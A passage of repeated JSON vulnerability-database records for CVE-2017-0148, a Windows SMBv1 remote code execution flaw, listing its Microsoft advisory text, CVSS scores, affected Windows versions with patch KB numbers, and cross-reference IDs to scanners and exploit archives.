"symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB3210721", "KB3177186", "KB4013198", "KB3213986", "KB4012217", "KB3212646", "KB3205409", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB4012215", "KB4012214", "KB4012213", "KB4012216", "KB4013429", "KB4012212", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-14T04:52:34", "differentElements": ["msAffectedSoftware"], "edition": 46}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T11:28:55", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-14T04:52:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-14T04:52:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KB3210720", "KBMS16-110, 3187754", "KB4012214", "KB3210721", "KB4012606", "KB3213986", 
"KB4012213", "KB4012215", "KB3212646", "KB3205409", "KB4012212", "KB4013198", "KB4012217", "KB4012216", "KB4012598", "KB4013429", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
